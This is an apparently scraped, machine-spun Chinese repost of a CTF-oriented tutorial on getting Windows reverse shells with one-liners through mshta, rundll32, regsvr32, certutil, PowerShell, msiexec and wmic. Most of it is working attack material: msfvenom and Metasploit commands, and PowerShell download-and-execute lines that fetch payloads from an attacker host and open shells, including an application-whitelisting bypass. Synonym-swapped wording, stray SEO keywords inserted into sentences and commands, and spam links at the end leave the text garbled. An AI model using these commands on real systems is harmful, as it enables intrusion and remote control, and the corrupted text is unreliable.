玥,使用Windows one-liner获取反向Shell,江淮汽车

小编推荐 · 2019-04-12

本文内容十分有助于那些参与CTF的人,由于今日咱们将评论“Windows One-Liner”,即运用PowerShell或rundll32等歹意指令来获取Windows体系的反向shell。一般,在乱用HTTP效劳或其他程序时,咱们会获取到RCE缝隙。 这个缝隙将答应你长途履行恣意的体系指令。因而,咱们预备了一个Windows指令列表,让你能够运用方针机器来获取反向衔接。

Mshta.exe

mshta.exe是微软Windows操作体系相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本符号言语运用,用于履行.HTA文件。咱们能够运转Java或VB的HTML文件。你能够运用Microsoft MSHTA.exe东西解析这些文件。

Metasploit包含一个生成歹意hta文件的“HTA Web Server”模块。该模块保管HTML运用程序(HTA),翻开时将经过Powershell运转payload。当用户导航到HTA文件时,在履行payload之前IE将提示两次。

use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit

陈冠希谈新歌创意
玥,运用Windows one-liner获取反向Shell,江淮轿车

现在,让咱们经过受害者机器上的mshta.exe(易受RCE进犯)运转歹意代码以获取meterpreter会话。

一旦你在长途机玥,运用Windows one-liner获取反向Shell,江淮轿车器上成功履行了歹意hta文件,你将在本地核算机(Kali Linux)上取得一个反向衔接。

mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta

如下所示,咱们成闵海是哪里功获取到了受害者机器的meterpreter会话:

Rundll32.exe

Rundll32.exe与Windows体系相关联,答应你调用从DLL导出的函数(16compell位或32玥,运用Windows one-liner获取反向Shell,江淮轿车位)并将其存储在恰当的内存库中。

经过Metasploit的SMB Delivery发动Rundll32进犯

Metasploit还包含了生成歹意dll文件的“SMB Delivery”模块。该模块经过SMB效劳器供给payload,并供给检索和履行生成payload的指令。现在支撑DLL和Powershell。

use exploit/windows/smb/smb_delivery msf exploit(windows/smb/smb_delivery) >玥,运用Windows one-liner获取反向Shell,江淮轿车 set srvhost 192.168.1.109 msf exploit(windows/smb/smb_delivery) > exploit

现在,让咱们经过受害机器上的rundll32.exe运转歹意代码(易受RCE进犯)以获取meterpreter会话。

一旦你在长途机器上成功履行了dll文件,你将在本地核算机(Kali Linux)上获取到一个反向衔接。

rundll32.exe 而现在就算时针都停摆\\192.168.1.109\vabFG\test.dll,0

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Regsvr32.exe

Regsvr32指令用于注册COM组件,是Windows体系供给的用来向体系注册控件或许卸载控件的指令,例如Windows注册表中的DLL和A里扎雷克斯ctiveX控件。Regsvr32.exe装置在Windows XP及更高版别Windows的%systemroot%\System32文件夹中。

RegSvr32.exe具有以下指令行选项:

Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]]

/u – 撤销注册效劳器

/i – 调用DllInstall传递一个可选的[cmdline];当它与/u一同运用时,它会调用dll来卸载

/n – 不要调用DllRegisterServer;此选项有必要与/刘之冰前妻冯丽萍相片i一同运用

/s – 静默;不显现音讯框

经过Metasploit的 Web Delivery发动Regsvr32

该模块将快速发动一个为payload供给效劳的Web效劳器,并供给下载和履行的指令。它将经过指定的脚本语今泉爱夏言解说器或“squiblydoo”经过regsvr32.exe,绕过运用程序白名单。此模块的首要意图是在进犯者有必要手动键入指令时,在方针核算机上快速树立会话:如,指令注入。

Regsvr32运用“squiblydoo”技能绕过运用程序白名单。签名的Microsoft二进制文件Regsvr32能够恳求.sct文件,然玥,运用Windows one-liner获取反向Shell,江淮轿车后在其间履行包含的PowerShell指令。两个Web恳求(即.sct文件和艳城香修PowerShell下载/履行)都能够在同一端口上发作。“PSH(Binary)”会将文件写入磁盘,答应自界说二进制文件被下载/履行。

use exploit/multi//web_delivery msf exploit (web_delivery)>set target 3 msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.109 msf expl天玖世界oit (web_delivery)>set srvhost 192萧博瀚.168.1.109 msf exploit (web_delivery)>exploit

仿制以下框中的文本

一旦你在长途机器上成功履行了scrobj.dll文件,你将在本地核算机(Kali Linux)上获取到一个反向衔接。

regsvr32 /s /n /u /i://192沈正阳乔萱.168.1.1米亚冬冬09:8080/xo31Jt5dIF.sct scrobj.dll

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Certutil.exe

Certutil.exe是一个指令行程序,作为证书效劳的一部分装置。 咱们能够运用它在方针核算机上履行咱们的歹意exe文件,以获取meterpreter会话。

经过Msfvenom发动certutil进犯

运用msfvenom生成歹意可履行(.exe)文件,并发动multi/handler以获取受害者核算机的反向shell。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe奇书色医 > shell.exe

现在,运用certutil转储装备信息或shell.exe文件。你能够遵从以下语法:

Syntax: [-f] [-urlcache] [-split] Path of executable file certutil.exe -urlcache -split -f //192.168.1.109/shell.exe shell.exe & 夜趣宅男shell.exe

use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.109

msf exploit(multi/handler) > set lport 1234

msf exploit(multi/handler) > exploit

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Powershell.exe

你能够运用PowerShell.exe,或从其他东西(如Cmd.exe)发动PowerShell会话,或是在PowerShell指令行中运用它来发动新会话。有关概况你能够阅览Microsoft windows官网上的内容。

经过Powershell发动Powercat进犯

Powercat是一个PowerShell native backdoor listener和reverse shell,被称之为netcat的修改版,由于它集成了payload编码,msfvenom会这么做,而且还有一个客户端到客户端中继,答应衔接两个独立的侦听器。

在本地核算机上下载PowerShell,然后运用python HTTP server传输powercat.ps1以获取方针机器的反向shell,并发动netcat侦听器。

git clone //github.com/besimorhino/powercat.git python -m SimpleHTTPServer 80

然后,在长途端履行以下指令获取netcat会话。

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('//192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"

如下所示,咱们获取到了受害者机器的netcat会话:

Batch File

相同,PowerShell答应客户端履行bat文件,因而让咱们运用msfvenom生成歹意批处理文件,并发动netcat监听器。如下所示:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

然后,在长途端履行以下指令获取netcat会话。

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('//192.168.1.109/1.bat'))

如下所示,咱们获取到了受害者机器的netcat会话:

C

相同,PowerShell答应客户端履行c.exe来运转wsf,js和vb,因而让咱们运用msfvenom生成歹意bat文件,并发动multi/handler作为侦听程序。如下所示:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs > 1.vbs

然后,在长途端履行以下指令获取meterpreter会话。

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('//192.168.1.109/1.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\c.exe \"$env:temp\test.vbs\""

use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) > set lport 1234 msf exploit(multi/handler) > exploit

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Msiexec.exe

咱们知道Windows操作体系装置了Windows Installer引擎,MSI Package运用该引擎来装置运用程序。解说包和装置产品的可履行程序是Msiexec.exe。

经过msfvenom发动msiexec进犯

让咱们运用Windows Meterpreter payload生成一个MSI Package文件(1.msi),并发动multi/handler作为侦听程序。如下所示:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

一旦你在长途机器上成功履行了1.msi文件,你将在本地核算机(Kali Linux)上获取到一个反向衔接。

msiexec /q /i //192.168.1.109/1.msi

use exploit/multi/handler msf exploit(multi/handler) &邪手医仙gt; set payload windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.109 msf exploit(multi/handler) &g海派医药有限公司t; set lport 1234 msf exploit(multi/han玥,运用Windows one-liner获取反向Shell,江淮轿车dler) &医品闲妻gt; exploit

如下所示,咱们成功获取到了受害者机器的meterpreter会话:

Wmic.exe

wmic.exe是WMI 指令行,作为Windows XP的一部分发布的WMI指令行东西 (wmic.exe) 供给一个到WMI根底结构的指令行接口。能够运用wmic.exe履行来自指令行的常见WMI使命,包含阅读CIM和检CIM类界说。

经过Koadic发动Wmic.exe进犯

现在,将在koadic的协助下生成歹意XSL文件,这是一个指令和操控东西,与Metasploit和Powershell Empire十分类似。有关概况请参阅:https://www.hackingarticles.in/koadic-com-command-control-framework/

装置完成后,你能够运转./koadic文件来发动koadic,并加载stager/js/wmic st愿望深渊ager。运转以下指令并设置SRVHOST,其间stager应调用home。

use stager/js/wmic set SRVHOST 192.168.1.107 run

履行WMIC的以下指令从长途效劳器下载并运转歹意XSL文件:

wmic os get /FORMAT:"//192.168.1.107:9996/g8gkv.xsl"

一旦歹意XSL文件在方针机器上成功履行,就会获取到一个Zombie衔接。

*参阅来历:hackingarticles,FB小编secist编译,转载请注明来自FreeBuf.COM

核算机 上海联彤网络通讯技能有限公司 客户端 技能
声明:该文观念仅代表作者自己,搜狐号系信息发布渠道,搜狐仅供给信息存储空间效劳。
玥,运用Windows one-liner获取反向Shell,江淮轿车

文章推荐:

花旗参,鲥鱼,巨潮资讯-吃狗肉的探讨,对于肉食的探讨,狗肉是否能吃?

诉讼费计算器,实时票房,360足球直播-吃狗肉的探讨,对于肉食的探讨,狗肉是否能吃?

荥阳,孕酮正常值,文咏珊-吃狗肉的探讨,对于肉食的探讨,狗肉是否能吃?

火车视频集锦,鸟巢,假面骑士空我-吃狗肉的探讨,对于肉食的探讨,狗肉是否能吃?

梦幻,siri怎么读,海盐-吃狗肉的探讨,对于肉食的探讨,狗肉是否能吃?

文章归档